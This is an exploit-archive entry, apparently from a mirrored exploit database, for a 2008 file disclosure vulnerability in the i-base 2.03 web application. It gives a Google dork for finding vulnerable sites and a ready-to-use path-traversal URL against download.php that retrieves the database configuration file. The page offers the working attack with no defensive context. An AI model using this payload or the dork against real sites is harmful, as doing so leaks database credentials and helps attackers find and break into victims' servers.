ibase <= 2.03 (download.php) Remote File Disclosure Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : ibase <= 2.03 (download.php) Remote File Disclosure Vulnerability
# Published : 2008-07-24
# Author : Dyshoo
# Previous Title : Atom PhotoBlog 1.1.5b1 (photoId) Remote SQL Injection Vulnerability
# Next Title : Wordpress Plugin Download Manager 0.2 Arbitrary File Upload Exploit

Name: [AFD] i-base <= 2.03
Author: Dyshoo
Vendor: http://www.i-base.net/
Dork: "inurl:ibase site:de"

http://[site]/ibase/zubehoer/download.php?filename=[file]

Database config:
http://[site]/ibase/zubehoer/download.php?filename=../config/config_db.php

# www.Syue.com [2008-07-24]